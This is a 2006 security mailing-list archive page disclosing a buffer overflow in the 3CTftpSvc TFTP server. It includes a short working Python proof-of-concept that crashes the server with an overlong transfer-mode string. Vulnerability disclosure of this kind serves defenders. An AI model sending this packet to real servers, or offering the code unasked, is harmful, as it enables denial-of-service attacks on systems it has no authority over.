Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

TFTP Server 3CTftpSvc Buffer Overflow Vulnerability (Long transporting m

from [liuqx] Network Security [Permanent Link]
Subject: TFTP Server 3CTftpSvc Buffer Overflow Vulnerability (Long transporting mode)
Date: 26 Nov 2006 12:31:48 -0000 
TFTP Server 3CTftpSvc Buffer Overflow Vulnerability (Long transporting mode)

------------------------------------------------------------------
SUMMARY:

3CTftpSvc TFTP Server is a Freeware TFTP server for Windows 9x/NT/XP.
(http://support.3com.com/software/utilities_for_windows_32_bit.htm 
or ftp://ftp.3com.com/pub/utilbin/win32/3CTftpSvc.zip) 
It provides an implementation of the TFTPv2 protocol.

A vulnerability has been identified in 3CTftpSvc TFTP Server, which could be 
exploited by attackers to execute arbitrary commands or cause a denial of 
service. This flaw is due to a buffer overflow error when handling an overly 
long transporting mode (more than 470 bytes) passed to a "GET" or "PUT" 
command, which could be exploited by malicious users to compromise a vulnerable 
system or crash an affected application.
----------
DETAILS:

 Vulnerable systems: 3CTftpSvc TFTP Server 2.0.1 and probable prior
 
Exploit:

#!/usr/bin/python
# Buffer Overflow (Long transporting mode) Vulnerability Exploit
# This is just a DoS exploiting code
# Tested on Windows xp SP2
#
# Requires python and impacket
#
# Coded by Liu Qixu Of NCNIPC

import socket
import sys

host = '192.168.1.11'
port = 69

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except: 
    print "socket() failed"         
    sys.exit(1)

filename = "A" 
mode = "netascii" + "A" * 469
da = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(da, (host, port))

------------------------------------------
Liu Qixu
NCNIPC
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • TFTP Server 3CTftpSvc Buffer Overflow Vulnerability (Long transporting mode), liuqx <=
Previous by Date:  Re: [Full-disclosure] The state of JavaScript Hacking, Martin Johns
Next by Date:  CuteNews v1.4.5 (search.php) Remote file include vulnerability, philip anselmo
Previous by Thread:  VMware 5.5.1 Local Buffer Overflow (HTML Exploit), NormandiaN_MailID
Next by Thread:  CuteNews v1.4.5 (search.php) Remote file include vulnerability, philip anselmo
Indexes:  [Date] [Thread] [Top] [All Lists]